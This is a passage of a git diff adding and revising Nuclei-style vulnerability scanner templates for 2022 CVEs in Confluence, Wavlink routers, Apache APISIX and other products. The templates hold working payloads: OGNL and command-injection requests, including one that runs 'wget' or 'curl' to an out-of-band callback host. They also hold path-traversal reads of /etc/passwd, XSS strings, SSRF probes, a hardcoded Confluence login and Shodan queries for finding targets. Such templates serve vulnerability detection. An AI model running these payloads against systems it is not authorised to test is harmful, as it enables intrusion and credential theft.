+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-23854.yaml b/cves/2022/CVE-2022-23854.yaml
new file mode 100644
index 0000000000..15635ed27f
--- /dev/null
+++ b/cves/2022/CVE-2022-23854.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-23854
+
+info:
+  name: AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal
+  author: For3stCo1d
+  severity: high
+  description: |
+    AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).
+  reference:
+    - https://packetstormsecurity.com/files/cve/CVE-2022-23854
+    - https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
+  classification:
+    cve-id: CVE-2022-23854
+  metadata:
+    verified: true
+    shodan-query: http.html:"InTouch Access Anywhere"
+  tags: lfi,packetstorm,cve,cve2022,aveva,intouch
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'for 16-bit app support'
+          - 'extensions'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - EricomSecureGateway
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-23944.yaml b/cves/2022/CVE-2022-23944.yaml
index 7dd8a3e7c8..de7aa65f39 100644
--- a/cves/2022/CVE-2022-23944.yaml
+++ b/cves/2022/CVE-2022-23944.yaml
@@ -3,16 +3,19 @@ id: CVE-2022-23944
 info:
   name: Apache ShenYu Admin Unauth Access
   author: cckuakilong
-  severity: medium
+  severity: critical
   description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
   reference:
     - https://github.com/apache/incubator-shenyu/pull/2462
     - https://nvd.nist.gov/vuln/detail/CVE-2022-23944
     - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
-  classification:
-    cve-id: CVE-2022-23944
-    cwe-id: CWE-862
+    - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y
   remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2022-23944
+    cwe-id: CWE-306
   tags: cve,cve2022,shenyu,unauth,apache
 
 requests:
diff --git a/cves/2022/CVE-2022-24112.yaml b/cves/2022/CVE-2022-24112.yaml
index 1284bb17a3..5f79eaed68 100644
--- a/cves/2022/CVE-2022-24112.yaml
+++ b/cves/2022/CVE-2022-24112.yaml
@@ -10,17 +10,17 @@ info:
     - https://twitter.com/sirifu4k1/status/1496043663704858625
     - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
     - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
+  remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-24112
     cwe-id: CWE-290
-  remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).
   metadata:
-    shodan-query: title:"Apache APISIX Dashboard"
     fofa-query: title="Apache APISIX Dashboard"
     product: https://apisix.apache.org
-  tags: cve,cve2022,apache,rce,apisix,oast
+    shodan-query: title:"Apache APISIX Dashboard"
+  tags: cve,cve2022,apache,rce,apisix,oast,kev
 
 requests:
   - raw:
@@ -41,7 +41,7 @@ requests:
             {
               "method":"PUT",
               "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
-              "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}"
+              "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}"
             }
           ]
         }
diff --git a/cves/2022/CVE-2022-24124.yaml b/cves/2022/CVE-2022-24124.yaml
index c33c0d7f03..046dee8d11 100644
--- a/cves/2022/CVE-2022-24124.yaml
+++ b/cves/2022/CVE-2022-24124.yaml
@@ -18,7 +18,7 @@ info:
   metadata:
     product: https://casdoor.org/
     shodan-query: http.title:"Casdoor"
-  tags: cve,cve2022,casdoor,sqli,unauth
+  tags: sqli,unauth,packetstorm,edb,cve,cve2022,casdoor
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-24129.yaml b/cves/2022/CVE-2022-24129.yaml
new file mode 100644
index 0000000000..9d3dc396c3
--- /dev/null
+++ b/cves/2022/CVE-2022-24129.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-24129
+
+info:
+  name: Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery
+  author: 0x_Akoko
+  severity: high
+  description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.
+  reference:
+    - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF
+    - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP
+    - http://shibboleth.net/community/advisories/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24129
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
+    cvss-score: 8.2
+    cve-id: CVE-2022-24129
+    cwe-id: CWE-918
+  tags: cve,cve2022,ssrf,oidc,shibboleth
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "ShibbolethIdp"
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2022/CVE-2022-24181.yaml b/cves/2022/CVE-2022-24181.yaml
new file mode 100644
index 0000000000..74e3fe66ac
--- /dev/null
+++ b/cves/2022/CVE-2022-24181.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-24181
+
+info:
+  name: PKP Open Journals System 3.3 - Cross-Site Scripting
+  author: lucasljm2001,ekrause
+  severity: medium
+  description: |
+    Detects an XSS vulnerability in Open Journals System.
+  reference:
+    - https://www.exploit-db.com/exploits/50881
+    - https://github.com/pkp/pkp-lib/issues/7649
+    - https://youtu.be/v8-9evO2oVg
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181
+    - https://nvd.nist.gov/vuln/detail/cve-2022-24181
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-24181
+  metadata:
+    verified: true
+  tags: cve,cve2022,xss,oss,pkp-lib,edb
+
+requests:
+  - raw:
+      - |
+        GET /iupjournals/index.php/esj HTTP/2
+        Host: {{Hostname}}
+        X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script><x=".com/iupjournals'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-24260.yaml b/cves/2022/CVE-2022-24260.yaml
index 4dff47e763..e0535c78c8 100644
--- a/cves/2022/CVE-2022-24260.yaml
+++ b/cves/2022/CVE-2022-24260.yaml
@@ -10,7 +10,7 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-24260
     - https://www.voipmonitor.org/changelog-gui?major=5
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-24260
     cwe-id: CWE-89
diff --git a/cves/2022/CVE-2022-24288.yaml b/cves/2022/CVE-2022-24288.yaml
index c42fd51b97..bef446a175 100644
--- a/cves/2022/CVE-2022-24288.yaml
+++ b/cves/2022/CVE-2022-24288.yaml
@@ -3,12 +3,12 @@ id: CVE-2022-24288
 info:
   name: Apache Airflow OS Command Injection
   author: xeldax
-  severity: critical
-  description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command
-    Injection from the web UI.
+  severity: high
+  description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.
   reference:
     - https://github.com/advisories/GHSA-3v7g-4pg3-7r6j
     - https://nvd.nist.gov/vuln/detail/CVE-2022-24288
+    - https://lists.apache.org/thread/dbw5ozcmr0h0lhs0yjph7xdc64oht23t
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
diff --git a/cves/2022/CVE-2022-24681.yaml b/cves/2022/CVE-2022-24681.yaml
new file mode 100644
index 0000000000..23ac75d013
--- /dev/null
+++ b/cves/2022/CVE-2022-24681.yaml
@@ -0,0 +1,49 @@
+id: CVE-2022-24681
+
+info:
+  name: ManageEngine ADSelfService - Stored Cross-Site Scripting
+  author: Open-Sec
+  severity: medium
+  description: |
+    Zoho ManageEngine ADSelfService Plus before 6121 allows XSS via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screen.
+  reference:
+    - https://raxis.com/blog/cve-2022-24681
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24681
+    - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html
+    - https://manageengine.com
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-24681
+    cwe-id: CWE-79
+  tags: cve,cve2022,manageengine,xss,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /servlet/GetProductVersion HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        name: buildnumber
+        group: 1
+        regex:
+          - '"BUILD_NUMBER":"([0-9]+)",'
+        internal: true
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - compare_versions(buildnumber, '< 6121')
+
+      - type: word
+        part: body
+        words:
+          - "ManageEngine"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-24856.yaml b/cves/2022/CVE-2022-24856.yaml
new file mode 100644
index 0000000000..0dd01066ff
--- /dev/null
+++ b/cves/2022/CVE-2022-24856.yaml
@@ -0,0 +1,33 @@
+id: CVE-2022-24856
+
+info:
+  name: Flyte Console <0.52.0 - Server-Side Request Forgery
+  author: pdteam
+  severity: high
+  description: |
+    FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.
+  reference:
+    - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9
+    - https://github.com/flyteorg/flyteconsole/pull/389
+    - https://hackerone.com/reports/1540906
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24856
+  remediation: |
+    The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-24856
+    cwe-id: CWE-918
+  tags: cve,cve2022,flyteconsole,ssrf,oss,hackerone
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cors_proxy/https://www.interact.sh"
+
+    matchers:
+      - type: word
+        words:
+          - "Interactsh Server"
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2022/CVE-2022-2486.yaml b/cves/2022/CVE-2022-2486.yaml
new file mode 100644
index 0000000000..1c7ddb2de8
--- /dev/null
+++ b/cves/2022/CVE-2022-2486.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-2486
+
+info:
+  name: Wavlink Mesh.cgi - Remote Code Execution
+  author: For3stCo1d
+  severity: critical
+  description: |
+    A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
+  reference:
+    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486
+    - https://vuldb.com/?id.204537
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-2486
+    cwe-id: CWE-78
+  metadata:
+    shodan-query: http.title:"Wi-Fi APP Login"
+    verified: "true"
+  tags: cve,cve2022,iot,wavlink,router,rce,oast
+
+requests:
+  - raw:
+      - |
+        GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 500
diff --git a/cves/2022/CVE-2022-2487.yaml b/cves/2022/CVE-2022-2487.yaml
new file mode 100644
index 0000000000..5b4050ce03
--- /dev/null
+++ b/cves/2022/CVE-2022-2487.yaml
@@ -0,0 +1,52 @@
+id: CVE-2022-2487
+
+info:
+  name: Wavlink Nightled.cgi - Remote Code Execution
+  author: For3stCo1d
+  severity: critical
+  description: |
+    A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used.
+  reference:
+    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487
+    - https://vuldb.com/?id.204538
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-2487
+    cwe-id: CWE-78
+  metadata:
+    shodan-query: http.title:"Wi-Fi APP Login"
+    verified: "true"
+  tags: cve,cve2022,iot,wavlink,router,rce,oast
+
+variables:
+  cmd: "id"
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        POST /cgi-bin/nightled.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        page=night_led&start_hour=;{{cmd}};
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "uid="
+          - "gid="
+          - "nightStart"
+        condition: and
+
+      - type: word
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-2488.yaml b/cves/2022/CVE-2022-2488.yaml
new file mode 100644
index 0000000000..0f9e32c5d7
--- /dev/null
+++ b/cves/2022/CVE-2022-2488.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-2488
+
+info:
+  name: Wavlink Touchlist_sync.cgi - Remote Code Execution
+  author: For3stCo1d
+  severity: critical
+  description: |
+    A vulnerability was found in WAVLINK WN535K2 and WN535K3 and classified as critical. This issue affects some unknown processing of the file /cgi-bin/touchlist_sync.cgi. The manipulation of the argument IP leads to os command injection. The exploit has been disclosed to the public and may be used.
+  reference:
+    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488
+    - https://vuldb.com/?id.204539
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-2488
+    cwe-id: CWE-78
+  metadata:
+    shodan-query: http.title:"Wi-Fi APP Login"
+    verified: "true"
+  tags: cve,cve2022,iot,wavlink,router,rce,oast
+
+requests:
+  - raw:
+      - |
+        GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 500
diff --git a/cves/2022/CVE-2022-24899.yaml b/cves/2022/CVE-2022-24899.yaml
new file mode 100644
index 0000000000..d3065ed150
--- /dev/null
+++ b/cves/2022/CVE-2022-24899.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-24899
+
+info:
+  name: Contao 4.13.2 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.
+  reference:
+    - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
+    - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24899
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-24899
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: title:"Contao"
+  tags: cve,cve2022,contao,xss,huntr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"></script><script>alert(document.domain)</script>'
+          - '"Not authenticated"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
diff --git a/cves/2022/CVE-2022-24900.yaml b/cves/2022/CVE-2022-24900.yaml
new file mode 100644
index 0000000000..f5a13dc7a6
--- /dev/null
+++ b/cves/2022/CVE-2022-24900.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-24900
+
+info:
+  name: Piano LED Visualizer 1.3 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: |
+    Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion.
+  reference:
+    - https://github.com/onlaj/Piano-LED-Visualizer/issues/350
+    - https://vuldb.com/?id.198714
+    - https://www.cvedetails.com/cve/CVE-2022-24900/
+    - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2022-24900
+    cwe-id: CWE-610
+  tags: cve,cve2022,lfi,piano,iot,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2022/CVE-2022-25216.yaml b/cves/2022/CVE-2022-25216.yaml
index adef971fa1..fbccebf9ef 100644
--- a/cves/2022/CVE-2022-25216.yaml
+++ b/cves/2022/CVE-2022-25216.yaml
@@ -1,19 +1,19 @@
 id: CVE-2022-25216
 
 info:
-  name: DVDFab 12 Player/PlayerFab - Arbitrary File Read
+  name: DVDFab 12 Player/PlayerFab - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access
+  description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.
   reference:
     - https://www.tenable.com/security/research/tra-2022-07
-    - https://www.cvedetails.com/cve/CVE-2022-25216
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-25216
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2022-25216
     cwe-id: CWE-22
-  tags: cve,cve2022,dvdFab,lfi,lfr
+  tags: cve,cve2022,dvdFab,lfi,lfr,tenable
 
 requests:
   - method: GET
@@ -33,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2022/CVE-2022-25323.yaml b/cves/2022/CVE-2022-25323.yaml
index 4952a62919..c5d5548842 100644
--- a/cves/2022/CVE-2022-25323.yaml
+++ b/cves/2022/CVE-2022-25323.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
     - https://nvd.nist.gov/vuln/detail/CVE-2022-25323
+    - https://awillix.ru
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2022/CVE-2022-26134.yaml b/cves/2022/CVE-2022-26134.yaml
new file mode 100644
index 0000000000..f56d736094
--- /dev/null
+++ b/cves/2022/CVE-2022-26134.yaml
@@ -0,0 +1,50 @@
+id: CVE-2022-26134
+
+info:
+  name: Confluence - Remote Code Execution
+  author: pdteam,jbertman
+  severity: critical
+  description: |
+    Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.
+  reference:
+    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
+    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
+    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
+    - https://jira.atlassian.com/browse/CONFSERVER-79016
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-26134
+    cwe-id: CWE-74
+  metadata:
+    shodan-query: http.component:"Atlassian Confluence"
+    verified: "true"
+  tags: cve,cve2022,confluence,rce,ognl,oast,kev
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
+      - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"
+
+    stop-at-first-match: true
+    req-condition: true
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(to_lower(all_headers_1), "x-cmd-response:")'
+
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "dns")'
+          - 'contains(to_lower(response_2), "confluence")'
+        condition: and
+
+    extractors:
+      - type: kval
+        part: header
+        kval:
+          - "x_cmd_response"
+
+# Enhanced by mp on 2022/07/04
diff --git a/cves/2022/CVE-2022-26138.yaml b/cves/2022/CVE-2022-26138.yaml
new file mode 100644
index 0000000000..6bfc107c59
--- /dev/null
+++ b/cves/2022/CVE-2022-26138.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-26138
+
+info:
+  name: Questions For Confluence - Hardcoded Credentials
+  author: HTTPVoid
+  severity: critical
+  description: |
+    A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group.
+  reference:
+    - https://twitter.com/fluepke/status/1549892089181257729
+    - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26138
+    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-26138
+    cwe-id: CWE-798
+  metadata:
+    shodan-query: http.component:"Atlassian Confluence"
+  tags: cve,cve2022,confluence,atlassian,default-login,kev
+
+requests:
+  - raw:
+      - |
+        POST /dologin.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action
+
+    attack: pitchfork
+    payloads:
+      os_username:
+        - disabledsystemuser
+      os_password:
+        - disabled1system1user6708
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'location == "/httpvoid.action"'
\ No newline at end of file
diff --git a/cves/2022/CVE-2022-26148.yaml b/cves/2022/CVE-2022-26148.yaml
index fdab7777c3..145648a2d6 100644
--- a/cves/2022/CVE-2022-26148.yaml
+++ b/cves/2022/CVE-2022-26148.yaml
@@ -1,14 +1,15 @@
 id: CVE-2022-26148
 
 info:
-  name: Grafana Zabbix Integration - Credential Disclosure
+  name: Grafana & Zabbix Integration - Credentials Disclosure
   author: Geekby
   severity: critical
-  description: An issue was discovered in Grafana through 7.3.4, when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to
-    register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
+  description: |
+    Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-26148
     - https://2k8.org/post-319.html
+    - https://security.netapp.com/advisory/ntap-20220425-0005/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26148
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -16,7 +17,7 @@ info:
   metadata:
     fofa-query: app="Grafana"
     shodan-query: title:"Grafana"
-  tags: cve,cve2022,grafana,zabbix
+  tags: cve,cve2022,grafana,zabbix,exposure
 
 requests:
   - method: GET
@@ -50,4 +51,6 @@ requests:
         regex:
           - '"password":"(.*?)"'
           - '"username":"(.*?)"'
-          - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php'
\ No newline at end of file
+          - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php'
+
+# Enhanced by mp on 2022/05/19
diff --git a/cves/2022/CVE-2022-26159.yaml b/cves/2022/CVE-2022-26159.yaml
index 155341022e..41d6be2d94 100644
--- a/cves/2022/CVE-2022-26159.yaml
+++ b/cves/2022/CVE-2022-26159.yaml
@@ -4,11 +4,11 @@ info:
   name: Ametys CMS Information Disclosure
   author: Remi Gascou (podalirius)
   severity: medium
-  description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the
-    auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.
+  description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-26159
     - https://podalirius.net/en/cves/2022-26159/
+    - https://issues.ametys.org/browse/CMS-10973
   classification:
